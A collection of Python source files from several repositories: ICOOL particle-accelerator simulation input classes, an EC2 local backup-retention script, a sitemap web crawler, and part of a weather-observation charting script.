ICoolObject.check_command_params_init(self, BeamType.command_params, **kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
self.__icool_setattr__(name, value)
def __str__(self):
return 'BeamType: \n'
def __repr__(self):
return '[BeamType: ]'
def gen_for001(self, file):
file.write(str(self.partnum))
file.write(' ')
file.write(str(self.bmtype))
file.write(' ')
file.write(str(self.fractbt))
file.write('\n')
self.distribution.gen_for001(file)
file.write('\n')
file.write(str(self.nbcorr))
file.write('\n')
for c in self.enclosed_commands:
c.gen_for001(file)
```
#### File: jon2718/ipycool_2.0/drift.py
```python
import sys
from material import Material
from subregion import SubRegion
from sregion import SRegion
from icool_composite import ICoolComposite
from icoolobject import ICoolObject
from nofield import NoField
from repeat import Repeat
class Drift(SRegion):
"""
Drift region.
By default will generate a vacuum drift region with cylindrical geometry.
"""
begtag = ''
endtag = ''
num_params = 0
command_params = {
'slen': {'desc': 'SRegion length',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'zstep': {'desc': 'Z step',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'rhigh': {'desc': 'R high',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'outstep': {'desc': 'Output stepping (Meter)',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None},
'rep_drift': {'desc': 'Wrapped output SRegion',
'doc': '',
'type': 'Repeat',
'req': False,
'pos': None}
}
def __init__(self, **kwargs):
if ICoolObject.check_command_params_init(self, Drift.command_params, **kwargs) is False:
sys.exit(0)
material = Material(geom='CBLOCK', mtag='VAC')
nf = NoField()
sr = SubRegion(material=material, rlow=0, rhigh=self.rhigh, irreg=1, field=nf)
sreg = SRegion(zstep=self.zstep, nrreg=1, slen=self.slen)
sreg.add_enclosed_command(sr)
self.rep_drift = Repeat.wrapped_sreg(outstep=self.outstep, sreg=sreg)
def __call__(self, **kwargs):
ICoolObject.__call__(self, kwargs)
def __setattr__(self, name, value):
self.__icool_setattr__(name, value, Drift.command_params)
def __str__(self):
return 'Drift'
def gen_for001(self, file):
self.rep_drift.gen_for001(file)
```
#### File: jon2718/ipycool_2.0/icoolnamelistcontainer.py
```python
from icoolnamelist import *
from container import *
class ICoolNameListContainer(ICoolNameList, Container):
def gen_for001(self, file):
ICoolNameList.gen_for001(self, file)
Container.gen_for001(self, file)
```
#### File: jon2718/ipycool_2.0/ints.py
```python
from icoolnamelist import *
class Ints(ICoolNameList):
command_params = {
'ldedx': {
'desc': 'If .true. => simulate mean ionization energy loss dE/dx (true)',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'lscatter': {
'desc': 'if .true. => simulate multiple scattering',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'lstrag': {
'desc': 'If .true. => simulate energy straggling',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'ldecay': {
'desc': 'If .true. => simulate particle decays',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'ldray': {
'desc': 'If .true. => simulate discrete energy loss from delta rays',
'doc': 'When LDRAY is true, the program forces the parameters DELEV=2 and STRAGLEV=5.',
'type': 'Logical',
'req': False,
'default': True},
'linteract': {
'desc': 'If .true. => simulate inelastic nuclear interactions of pions, kaons and protons',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'lspace': {
'desc': 'If .true. => consider effects of space charge',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'lelms': {
'desc': 'If .true. => use ELMS model2 for energy loss and scattering',
'doc': 'When this command is true an external file ELMSCOM.TXT must be provided. '
'This file consists of two lines giving (1) the ELMS run directory including path '
'and (2) the root part of the path name to the ELMS database files. For example, '
'\muon\elmsdb\rundirectory.txt\n'
'\muon\elmsdb\elmsfv3run\n'
'ELMS only works in regions containing hydrogen (the SCATLEV model is used in other '
'regions). '
'For hydrogen regions use a stepsize around 5 mm for maximum accuracy. A stepsize of '
'1 mm gives significantly worse results.',
'type': 'Logical',
'req': False,
'default': False},
'lsamcs': {
'desc': 'If .true. => use SAMCS model3 of correlated straggling and scattering',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'delev': {
'desc': 'Model level for dEdx (2)',
'doc': '1: Bethe-Bloch\n'
'2: Bethe-Bloch with density effect\n'
'3: restricted Bethe-Bloch with density effect\n'
'4: test mode with dE = const * dz, independent of velocity and angle',
'type': 'Integer',
'req': False,
'default': 2,
'min': 1,
'max': 4},
'scatlev': {
'desc': '(I) model level for multiple scattering',
'doc': '1: Gaussian( 0, Rossi-Greisen )\n'
'2: Gaussian( 0, Highland )\n'
'3: Gaussian( 0, Lynch-Dahl )\n'
'4: Bethe version of Moliere distribution (with Rutherford limit)\n'
'5: Rutherford\n'
'6: Fano (with Rutherford limit)\n'
'7: Tollestrup (with Rutherford limit)\n'
'Level 2 contains a logarithm term in computing the Gaussian width, so\n'
'it is not useful for general monte carlo work. It gives an accurate estimate of\n'
'the width of the distribution when the step size is the same as the region size.\n'
'In models 4, 6, and 7 when the effective number of scatters is less than 20 Rutherford\n'
'scattering is used with the actual number of scatters in a given step taken from a\n'
'Poisson distribution.',
'type': 'Integer',
'req': False,
'default': 6,
'min': 1,
'max': 6},
'straglev': {
'desc': '(I) Model level for straggling ',
'doc': '1: Gaussian( Bohr )\n'
'2: Landau distribution\n'
'3: (not used)\n'
'4: Vavilov distribution (with appropriate Landau and Gaussian limits determined '
'by the program)\n'
'5: restricted energy fluctuations from continuous processes with energy below DCUTx.',
'type': 'Integer',
'req': False,
'default': 4,
'min': 1,
'max': 5},
'declev': {
'desc': '(I) model level for particle decays (1)',
'doc': '1: uniform polar decay angle for daughter particle in parent rest frame\n'
'2: 90 degree polar decay angle for daughter particle in parent rest frame\n'
'3: uniform polar decay angle for daughter particle in parent rest frame; '
'no mu-->e decays.\n'
'4: 90 degree polar decay angle for daughter particle in parent rest frame; '
'no mu->e decays\n'
'5: uniform polar decay angle for daughter particle in parent rest frame; '
'no mu-->e decays;\n'
'save accumulated fractional decay length in POL(1).',
'type': 'Integer',
'req': False,
'default': 1,
'min': 1,
'max': 5},
'intlev': {
'desc': 'Model level for nuclear interactions (1)',
'doc': '1: stop tracking after an interaction\n'
'2: stop tracking after an interaction, except for protons which generate '
'a pion from the Wang distribution.',
'type': 'Integer',
'req': False,
'default': 1,
'min': 1,
'max': 2},
'spacelev': {
'desc': 'Model level for space charge (3)',
'doc': '1: image charge of moving bunch in cylindrical, metallic can\n'
'2: crude transverse space charge for free space applied to all regions\n'
'3: Gaussian bunch space charge (transverse and longitudinal) for free space '
'applied to all regions\n'
'4: same as model 3 for single bunch in a bunch train. All the particles are '
'superimposed\n'
'on 1 bunch given by parameter FRFBUNSC. Adjust PARBUNSC accordingly.',
'type': 'Integer',
'req': False,
'default': 3,
'min': 1,
'max': 4},
'dcute': {
'desc': 'Kinetic energy of electrons, above which delta rays are discretely '
'simulated [GeV] ',
'doc': '',
'type': 'Float',
'req': False,
'default': 0.003},
'dcutm': {
'desc': 'Kinetic energy of muons and other heavy particles, above which delta '
'rays are discretely simulated [GeV] ',
'doc': '',
'type': 'Float',
'req': False,
'default': 0.003},
'elmscor': {
'desc': 'ELMS correlation ',
'doc': '0: run ELMS without correlations (0)\n'
'1: run ELMS with correlations',
'type': 'Integer',
'req': False,
'default': 0,
'min': 0,
'max': 1},
'facfms': {
'desc': 'Factor to correct the Z(Z+1) term in the characteristic angle squared '
'χC2 in Moliere multiple scattering theory '
'times relative to reference particle at plane IZFILE.',
'doc': '',
'type': 'Float',
'req': False,
'default': 1.0},
'facmms': {
'desc': 'Factor to correct the screening angle squared χA2 in Moliere multiple scattering theory',
'doc': '',
'type': 'Float',
'req': False,
'default': 1.0},
'fastdecay': {
'desc': 'If true => use unphysical decay constants to make {μ,π,K} decay immediately. ',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'frfbunsc': {
'desc': '(R) RF frequency used for space charge model 4. [MHz] (201.) ',
'doc': '',
'type': 'Float',
'req': False,
'default': 201},
'parbunsc': {
'desc': 'Number of muons per bunch for space charge calculation ',
'doc': '',
'type': 'Float',
'req': False,
'default': 4E12},
'pdelev4': {
'desc': 'Momentum for DELEV=4 calculation',
'doc': '',
'type': 'Float',
'req': False,
'default': 0.200},
'wanga': {
'desc': 'Wang parameter A ',
'doc': 'The Wang distribution is given by '
'd2σ/dp dΩ = A pMAX x (1-x) exp{-BxC – DpT} where x = pL / pMAX',
'type': 'Float',
'req': False,
'default': 90.1},
'wangb': {
'desc': 'Wang parameter B',
'doc': '',
'type': 'Float',
'req': False,
'default': 3.35},
'wangc': {
'desc': 'Wang parameter C',
'doc': '',
'type': 'Float',
'req': False,
'default': 1.22},
'wangd': {
'desc': 'Wang parameter D',
'doc': '',
'type': 'Float',
'req': False,
'default': 4.66},
'wangpmx': {
'desc': 'Wang parameter pMAX (1.500) The sign of this quantity is used to select '
'π+ or π- production.',
'doc': '',
'type': 'Float',
'req': False,
'default': 1.5},
'wangfmx': {
'desc': 'The maximum value of the Wang differential cross section',
'doc': '',
'type': 'Float',
'req': False,
'default': 13.706},
}
def __init__(self, **kwargs):
ICoolObject.check_command_params_init(self, Ints.command_params, **kwargs)
def __call__(self, **kwargs):
pass
def __setattr__(self, name, value):
self.__icool_setattr__(name, value, Ints.command_params)
def __str__(self):
return ICoolObject.__str__(self, 'INTS')
def __repr__(self):
return '[Control variables: ]'
def gen(self, file):
ICoolObject.gen(self, file)
```
#### File: jon2718/ipycool_2.0/refp.py
```python
import sys
from modeledcommandparameter import *
from pseudoregion import *
class Refp(ModeledCommandParameter, PseudoRegion):
"""
Reference particle
"""
begtag = 'REFP'
endtag = ''
models = {
'model_descriptor': {'desc': 'Phase model',
'name': 'phmodref',
'num_parms': 5,
'for001_format': {'line_splits': [5]}},
'0_crossing':
{'desc': '0-crossing phase iterative procedure',
'doc': 'Uses iterative procedure to find 0-crossing phase; tracks through all regions. Only works with ACCEL modesl 1,2 and 13.',
'icool_model_name': 2,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}}},
'const_v':
{'desc': 'Assumes constant reference particle velocity',
'doc': 'Applies to any region',
'icool_model_name': 3,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'pz0': {'pos': 2, 'type': 'Real', 'doc': ''},
't0': {'pos': 3, 'type': 'Real', 'doc': ''}}},
'en_loss':
{'desc': 'Assumes constant reference particle velocity',
'doc': 'Applies to any region',
'icool_model_name': 4,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'pz0': {'pos': 2, 'type': 'Real', 'doc': ''},
't0': {'pos': 3, 'type': 'Real', 'doc': ''},
'dedz': {'pos': 4, 'type': 'Real', 'doc': ''}}},
'delta_quad_cav':
{'desc': 'Assumes constant reference particle velocity',
'doc': 'Applies to any region',
'icool_model_name': 5,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'e0': {'pos': 2, 'type': 'Real', 'doc': ''},
'dedz': {'pos': 3, 'type': 'Real', 'doc': ''},
'd2edz2': {'pos': 4, 'type': 'Real', 'doc': ''}}},
'delta_quad_any':
{'desc': 'Assumes constant reference particle velocity',
'doc': 'Applies to any region',
'icool_model_name': 6,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'e0': {'pos': 2, 'type': 'Real', 'doc': ''},
'dedz': {'pos': 3, 'type': 'Real', 'doc': ''},
'd2edz2': {'pos': 4, 'type': 'Real', 'doc': ''}}},
}
def __init__(self, **kwargs):
if ModeledCommandParameter.check_command_params_init(self, Refp.models, **kwargs) is False:
sys.exit(0)
def __call__(self, **kwargs):
pass
def __setattr__(self, name, value):
self.__modeled_command_parameter_setattr__(name, value, Refp.models)
def __str__(self):
pass
```
#### File: jon2718/ipycool_2.0/regularregioncontainer.py
```python
from regularregion import *
from container import *
class RegularRegionContainer(RegularRegion, Container):
def __init__(self, **kwargs):
pass
def gen_for001(self, file):
Region.gen_for001(self, file)
Container.gen_for001(self, file)
if hasattr(self, 'endtag'):
file.write(self.get_endtag())
file.write('\n')
```
#### File: jon2718/ipycool_2.0/sregion.py
```python
from regularregioncontainer import *
# from subregion import SubRegion
class SRegion(RegularRegionContainer):
"""
SREGION - Start of new s-region. Describes field and material properties.
Parameters:
1.1) SLEN (R) Length of this s region [m]
1.2) NRREG (I) # of radial subregions of this s region {1-4}
1.3) ZSTEP (R) step for tracking particles [m]
Note that for fixed-stepping the program may modify this value slightly to get
an integral number of steps in the region.
The following parameters are repeated for each r subregion:
2.1) IRREG (I) r-region number
2.2) RLOW (R) Inner radius of this r subregion[m]
2.3) RHIGH (R) Outer radius of this r subregion[m]
3) FTAG (A4) Tag identifying field in this r subregion
(See specific field type below)
4) FPARM (R) 15 parameters describing field (see specific field type below)
These 15 parameters must be on one input line.
5) MTAG (2A4) Tag identifying material composition in this r subregion
The wedge geometry can accept a second MTAG parameter.
The first material refers to the interior of the wedge.
The second material, if present, refers to the exterior of the wedge.
If a second MTAG parameter is not present, vacuum is assumed. (see specific material type below)
6) MGEOM (A6) Tag identifying material geometry in this r subregion.
(see specific material type below)
7) GPARM (R) 10 Parameters describing material geometry.
These 10 parameters must be on one input line (see specific material type below)
"""
allowed_enclosed_commands = ['SubRegion']
begtag = 'SREGION'
endtag = ''
num_params = 3
for001_format = {'line_splits': [3]}
command_params = {
'slen': {
'desc': 'Length of this s region [m]',
'doc': '',
'type': 'Real',
'req': True,
'pos': 1},
'nrreg': {
'desc': '# of radial subregions of this s region {1-4}',
'doc': '',
'type': 'Int',
'min': 1,
'max': 4,
'req': True,
'pos': 2},
'zstep': {
'desc': 'Step for tracking particles [m]',
'doc': '',
'type': 'Real',
'req': True,
'pos': 3},
#'outstep': {
# 'desc': 'Step for generating OUTPUT commands within SRegion.',
# 'doc': 'Will wrap SRegion in REPEAT/ENDREPEAT statements.',
# 'type': 'Real',
# 'req': False,
# 'pos': None}
}
def __init__(self, **kwargs):
ICoolObject.check_command_params_init(self, SRegion.command_params, **kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
self.__icool_setattr__(name, value)
def __str__(self):
ret_str = 'SRegion:\n' + 'slen=' + str(self.slen) + '\n' + 'nrreg=' + str(self.nrreg) + '\n' + \
'zstep=' + str(self.zstep) + '\n' + str(Container.__str__(self))
return ret_str
def __repr__(self):
return 'SRegion:\n ' + 'slen=' + \
str(self.slen) + '\n' + 'nrreg=' + str(self.nrreg) + \
'\n' + 'zstep=' + str(self.zstep)
def add_subregion(self, subregion):
pass
def add_subregions(self, subregion_list):
pass
def gen_for001(self, file):
RegularRegionContainer.gen_for001(self, file)
```
#### File: jon2718/ipycool_2.0/stage.py
```python
from drift import *
from hard_edge_transport import *
from hard_edge_sol import *
from accel import *
import sys
class Stage(HardEdgeTransport):
"""
A final cooling stage comprises:
HardEdgeTransport with transport field comprising:
(1) Drift (d1)
(2) HardEdgeSol
(3) Drift (d2)
(4) Accel (Model 1 for now)
(5) Drift (d3)
"""
num_params = 3
command_params_ext = {
'd1_len': {'desc': 'Length of drift 1',
'doc': 'Initial drift region of stage length from entrance of stage to HardEdgeSol',
'type': 'FLoat',
'req': True,
'pos': None},
'd2_len': {'desc': 'Length of drift 2',
'doc': 'Drift region between HardEdgeSol and Accel',
'type': 'FLoat',
'req': True,
'pos': None},
'd3_len': {'desc': 'Length of drift 3',
'doc': 'Drift region between Accel and exit of stage',
'type': 'FLoat',
'req': True,
'pos': None},
'transport_field': {'desc': 'Transport field strength (Tesla)',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'absorber_field': {'desc': 'Field strength (Tesla)',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'absorber_length': {'desc': 'Length of absorber region',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'rf_length': {'desc': 'Length of rf region',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'zstep': {'desc': 'Z step',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'outstep': {'desc': 'Output stepping (Meter)',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None},
'rhigh': {'desc': 'R high',
'doc': '',
'type': 'Float',
'req': True,
'pos': None},
'hard_edge_sol': {'desc': 'Output stepping (Meter)',
'doc': 'Increment for output steps for constant B Field region',
'type': 'HardEdgeSol',
'req': False,
'pos': None},
'drift1': {'desc': 'Output stepping (Meter)',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Drift',
'req': False,
'pos': None},
'drift2': {'desc': 'Output stepping (Meter)',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Drift',
'req': False,
'pos': None},
'drift3': {'desc': 'Output stepping (Meter)',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Drift',
'req': False,
'pos': None},
'freq': {'desc': 'Frequency in MHz',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None},
'grad': {'desc': 'Gradient on-axis at center of gap [MV/m]',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None},
'phase': {'desc': 'Phase shift [deg] {0-360}.',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None},
'rect_cyn': {'desc': 'Phase shift [deg] {0-360}.',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None},
'mode': {'desc': 'Phase shift [deg] {0-360}.',
'doc': 'Increment for output steps for constant B Field region',
'type': 'Float',
'req': True,
'pos': None}}
def __init__(self, **kwargs):
if ICoolObject.check_command_params_init(self, Stage.command_params_ext, **kwargs) is False:
sys.exit(0)
HardEdgeTransport.__init__(self, flip=False, bs=self.transport_field)
drift1 = Drift(slen=self.d1_len, zstep=self.zstep, rhigh=self.rhigh, outstep=self.outstep)
drift2 = Drift(slen=self.d2_len, zstep=self.zstep, rhigh=self.rhigh, outstep=self.outstep)
drift3 = Drift(slen=self.d3_len, zstep=self.zstep, rhigh=self.rhigh, outstep=self.outstep)
rf = Accel(model='ez', freq=self.freq, phase=self.phase, grad=self.grad, rect_cyn=self.rect_cyn, mode=self.mode)
hard_edge_sol = HardEdgeSol(slen=self.absorber_length, outstep=self.outstep, mtag='LH', geom='CBLOCK', zstep=self.zstep, bs=self.absorber_field, rhigh=self.rhigh)
self.add_enclosed_command(drift1)
self.add_enclosed_command(hard_edge_sol)
self.add_enclosed_command(drift2)
rf_region = SRegion(slen=self.rf_length, nrreg=1, zstep=self.zstep)
material = Material(mtag='VAC', geom='CBLOCK')
rf_subregion = SubRegion(irreg=1, rlow=0, rhigh=self.rhigh, field=rf, material=material)
rf_region.add_enclosed_command(rf_subregion)
self.add_enclosed_command(rf_region)
self.add_enclosed_command(drift3)
def __call__(self, **kwargs):
pass
def __setattr__(self, name, value):
self.__icool_setattr__(name, value)
def __str__(self):
return 'Stage'
def gen_for001(self, file):
HardEdgeTransport.gen_for001(self, file)
``` |
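The `Drift` wrapper above assembles a vacuum `SRegion` and wraps it in a `Repeat` for output stepping, so a drift needs only four numbers. A minimal usage sketch (parameter values are illustrative and assume the ipycool modules are importable):

```python
from drift import Drift

# 1 m vacuum drift, 5 mm tracking step, 0.25 m aperture, with OUTPUT
# emitted every 0.1 m by the wrapping REPEAT block.
d = Drift(slen=1.0, zstep=0.005, rhigh=0.25, outstep=0.1)
with open('for001.dat', 'w') as f:
    d.gen_for001(f)
```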
{
"source": "jon2allen/aws-scripts",
"score": 3
} |
#### File: jon2allen/aws-scripts/ec2_local_backup_retention.py
```python
import sys
import os
import pytz
from datetime import datetime, timezone, timedelta
import argparse
def app_run():
parser = argparse.ArgumentParser(description='EC2 local Backup retention')
parser.add_argument('--days', help='days to retain ')
parser.add_argument('--dir', help='Linux EC2 server dir')
parser.add_argument(
'--backup_prefix', help="daily backup file prefix - use \'myback\' not \'myback*\'")
parser.add_argument(
'--suffix', help="daily backup file suffix - use 'xls' not '*.xls'")
parser.add_argument('--dry_run', action="store_true",
help='dry-run for testing')
args = parser.parse_args()
# special arg processing if necessary
def check_args():
days_specifed = None
file_prefix = ""
my_dir = ""
dry_run = False
if (args.dry_run):
dry_run = True
if (args.days):
days_specifed = int(args.days)
else:
days_specifed = 10
file_prefix = args.backup_prefix
file_suffix = args.suffix
if file_prefix is None:
file_prefix = " "
if file_suffix is None:
file_suffix = "... not specified"
my_dir = args.dir
return days_specifed, file_prefix, my_dir, dry_run, file_suffix
#
days_specifed, file_prefix, my_dir, dry_run, file_suffix = check_args()
if my_dir == None:
print("No dir specified - see -h for commands")
sys.exit(4)
today = datetime.now(timezone.utc)
retention_period = today - timedelta(days=days_specifed)
# main_entry_point
process_ec2_dir(days_specifed, file_prefix, file_suffix, my_dir,
dry_run, today, retention_period)
return
def process_ec2_dir(days_specifed, file_prefix, suffix, my_dir, dry_run, today, retention_period):
def print_parms(file_prefix, suffix, my_dir, today, retention_period):
print("today's date is ", today)
print("Start of retention period (days) ", retention_period)
print("EC2 server dir: ", my_dir)
print("backup prefix: ", file_prefix)
print("backup suffix: ", suffix)
return
def delete_files(dry_run, delete_candidate_list):
for obj in delete_candidate_list:
print("Deleting: ", obj)
if (dry_run == False):
os.remove(obj)
return
def deletion_summary(delete_candidate_list):
if (len(delete_candidate_list) > 0):
print("Number of files to delete: ", len(delete_candidate_list))
print("deleting older files")
return
def get_dir(my_dir):
objects = os.listdir(my_dir)
os.chdir(my_dir)
return objects
def get_file_timestamp(utc, o):
o_time = datetime.fromtimestamp(os.stat(o).st_ctime)
o_time = utc.localize(o_time)
return o_time
def filter_dir_obj(days_specifed, file_prefix, suffix, my_dir, retention_period, filter_lists):
found_candidate_list = filter_lists[1]
delete_candidate_list = filter_lists[0]
objects = get_dir(my_dir)
utc = pytz.UTC
for o in objects:
o_time = get_file_timestamp(utc, o)
# print("file: ", o, "time: ", o_time )
if o.startswith(file_prefix) or (o.endswith(suffix)):
found_candidate_list.append(o)
if o_time < retention_period:
print("older than " , days_specifed, " ", end='')
delete_candidate_list.append(o)
print("file: ", o, "time: ", o_time)
return
def list_summary(found_candidate_list):
print("***************Summary***************")
print("Num of objects found: ", len(found_candidate_list))
return
delete_candidate_list = []
found_candidate_list = []
filter_lists = [delete_candidate_list, found_candidate_list]
# main processing loop ec2 files
print_parms(file_prefix, suffix, my_dir, today, retention_period)
filter_dir_obj(days_specifed, file_prefix, suffix, my_dir,
retention_period, filter_lists)
list_summary(found_candidate_list)
deletion_summary(delete_candidate_list)
delete_files(dry_run, delete_candidate_list)
return
if __name__ == "__main__":
app_run()
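# Example invocation (hypothetical paths and prefix):
#   python ec2_local_backup_retention.py --days 14 --dir /var/backups \
#       --backup_prefix myback --suffix tar.gz --dry_run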
``` |
{
"source": "jon2allen/PySitemap",
"score": 3
} |
#### File: jon2allen/PySitemap/crawler.py
```python
import urllib.request
import urllib.error
from urllib.parse import urlsplit, urlunsplit, urljoin, urlparse
import re
class Crawler:
def __init__(self, url, exclude=None, no_verbose=False):
self.url = self.normalize(url)
self.host = urlparse(self.url).netloc
self.exclude = exclude
self.no_verbose = no_verbose
self.found_links = []
self.visited_links = [self.url]
def start(self):
self.crawl(self.url)
return self.found_links
def crawl(self, url):
if not self.no_verbose:
print("Parsing " + url)
try:
response = urllib.request.urlopen(url)
except urllib.error.URLError as e:
print('Failed to fetch ' + url + ' - ' + str(e))
return
page = str(response.read())
pattern = r'<a [^>]*href=[\'"](.*?)[\'"].*?>'  # note: a '|' inside [] would match a literal pipe
found_links = re.findall(pattern, page)
links = []
for link in found_links:
is_url = self.is_url(link)
if is_url:
is_internal = self.is_internal(link)
if is_internal:
self.add_url(link, links, self.exclude)
self.add_url(link, self.found_links, self.exclude)
for link in links:
if link not in self.visited_links:
link = self.normalize(link)
self.visited_links.append(link)
self.crawl(urljoin(self.url, link))
def add_url(self, link, link_list, exclude_pattern=None):
link = self.normalize(link)
if link:
not_in_list = link not in link_list
excluded = False
if exclude_pattern:
excluded = re.search(exclude_pattern, link)
if not_in_list and not excluded:
link_list.append(link)
def normalize(self, url):
# Rebuild the URL without its fragment so '#section' variants collapse to one link
scheme, netloc, path, qs, anchor = urlsplit(url)
return urlunsplit((scheme, netloc, path, qs, ''))
def is_internal(self, url):
host = urlparse(url).netloc
return host == self.host or host == ''
def is_url(self, url):
scheme, netloc, path, qs, anchor = urlsplit(url)
return url != '' and scheme in ['http', 'https', '']
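# Minimal usage sketch (hypothetical target URL; prints every internal link found):
#   crawler = Crawler("https://example.com")
#   for link in crawler.start():
#       print(link)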
``` |
{
"source": "jon2allen/weather_obs",
"score": 3
} |
#### File: jon2allen/weather_obs/daily_weather_obs_chart.py
```python
import logging
import sys
import os
import argparse
import csv
import re
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from matplotlib.dates import DateFormatter
import time
import datetime
import dateutil
import json
from obs_utils import trendline, read_weather_obs_csv, parse_date_from_station_csv
"""
This will find the last hour of the current day
if you want a specific file - specify --file
"""
logger = logging.getLogger('weather_obs_f')
def hunt_for_csv(file_id):
station_file_list = []
now = datetime.datetime.now()
day = str(now.day)
month = str(now.month)
dirlist = os.listdir()
target_csv = ''
for f in dirlist:
if(f[:10] == file_id):
if 'csv' in f:
logger.debug("station CSV file: %s", f)
station_file_list.append(f)
logger.debug("file: %s", f[:10])
logger.debug(station_file_list)
last_hour = 0
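# The fixed slice offsets below assume the canonical name 'KDCA_Y2021_M04_D04_H00.csv':
#   f[12:14] = month, f[16:18] = day, f[20:22] = hour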
for f in station_file_list:
m1 = int(f[12:14])
if m1 == int(now.month):
logger.debug("match month")
logger.debug("Month: %s ", f[12:14])
logger.debug("day: %s ", f[16:18])
logger.debug("hour: %s ", f[20:22])
d1 = int(f[16:18])
if (d1 == int(now.day)):
logger.debug("Match day: %s", f)
target_csv = f
if d1 < int(day):
logger.debug("In the past: %s", f)
return target_csv
"""
function: parse_date_from_station_csv (imported from obs_utils)
input: filename (canonical format - example 'KDCA_Y2021_M04_D04_H00.csv')
output: datetime of file
"""
def weather_obs_subset(obs1, obs_col):
""" returns a subset of data """
try:
obs_subset = obs1.iloc[:, obs_col]
return obs_subset
except Exception:
print("column index out of range or other error")
return obs1
def weather_obs_html_table(obs1, obs_col, file_f):
try:
obs_prn = obs1.iloc[:, obs_col]
out_text = obs_prn.to_html(na_rep = '<no_value_provided>')
except Exception:
print("column index out of range or other error")
return False
try:
file_html = open(file_f, 'w')
except OSError:
print("error - cannot open", file_f)
return False
file_html.write(out_text)
print(out_text)
file_html.close()
return True
def draw_obs_wind_chart(chart_date, fig_png, obs1):
""" draw chart to png file """
print ("bshape", obs1.shape)
obs1.drop(obs1.index[obs1['wind_mph'] == "<no_value_provided>"], inplace = True)
obs1 = obs1.reset_index(drop=True)
print("shape", obs1.shape)
obs1['wind_gust_mph'] = pd.to_numeric(
obs1['wind_gust_mph'], errors='coerce')
obs1['wind_mph'] = pd.to_numeric(obs1['wind_mph'], errors='coerce')
positions = []
labels = []
fig, ax = plt.subplots()
fig.set_size_inches(12, 6)
x = obs1['observation_time']
y = obs1['wind_mph']
z = obs1['wind_dir']
chart_loc = obs1['location']
print("chart_loc: ", chart_loc[0])
ax.plot_date(x, y, linestyle="solid")
plt.grid(True)
plt.title(str(chart_loc[0]) + " - " + chart_date, fontsize=15)
print("xlim: ", ax.get_xlim())
print("ylim: ", ax.get_ylim())
print("len y ", len(y))
print("len x ", len(x)," ", x.size )
print(x)
print(y)
for i in range(x.size):
if (i == (x.size - 1)):
ax.annotate(z[i], (mdates.date2num(x[i]), y[i]),
xytext=(-15, -15), textcoords='offset pixels')
else:
if y[i] == y[i+1]:
if (len(z[i]) > 7):
ax.annotate(z[i], (mdates.date2num(x[i]), y[i]), xytext=(15, -35), ha='center', va='center', rotation=315,
textcoords='offset pixels')
else:
ax.annotate(z[i], (mdates.date2num(x[i]), y[i]), xytext=(-30, -15),
textcoords='offset pixels')
else:
ax.annotate(z[i], (mdates.date2num(x[i]), y[i]), xytext=(-15, -15),
textcoords='offset pixels')
fig.autofmt_xdate()
fig.text(0.04, 0.5, 'Wind Speed - MPH', va='center',
rotation='vertical', fontsize=18)
fig.text(0.5, 0.05, 'Hour of day', va='center', fontsize=18)
if (len(y) > 2 ):
date_ser = mdates.date2num(x)
tr = trendline(date_ser, y)
fig.text(0.1, 0.05, 'Polyfit: {:8.4f}'.format(tr), va='center', fontsize=16)
# plt.xticks(positions,labels)
date_form = DateFormatter("%I")
ax.xaxis.set_major_formatter(date_form)
print(x)
print(y)
print(z)
print(x.size)
print(y.size)
fig.savefig(fig_png, dpi=fig.dpi)
return True
def obs_meta_date_json(station, obs1):
date_ser = mdates.date2num(obs1['observation_time'])  # use the argument, not the module-level json_out
y = obs1['wind_mph']
obs_data = {}
obs_data['station'] = station
obs_data['polyfit'] = 0
if len(y) > 1:
obs_data['polyfit'] = trendline(date_ser, y)
obs_data['max'] = obs1['wind_mph'].max()
obs_data['min'] = obs1['wind_mph'].min()
json_out2 = json.dumps(obs_data)
return json_out2
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='weather obs - daily chart')
parser.add_argument('--file', help='name of input file - csv ')
parser.add_argument('--chart', help='output png file')
parser.add_argument(
'--station', help='station - either linke or 4 char name')
parser.add_argument('--table', help='output html table file')
parser.add_argument("--tablecols", help='list of cols by position')
parser.add_argument("--listcols", action="store_true",
help='helper func - list columns by position')
parser.add_argument(
'--dir', help='directory - otherwise /var/www/html/weather_obs')
args = parser.parse_args()
# station is 4 character NOAA observation station in CAPS
